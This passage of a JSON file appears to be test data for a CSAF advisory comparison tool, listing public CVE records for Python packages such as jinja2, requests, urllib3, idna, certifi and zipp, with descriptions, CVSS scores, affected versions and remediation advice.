Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List 
Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of 
changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool. ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation. * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used. ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. 
### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7. ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": 
"LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected. However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. 
Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. ## Remediation * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. 
* Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, 
{"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store. GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": 
"UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. 
The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}, "diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE 
Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin. ## Remediation * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header. 
## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}}} \ No newline at end of file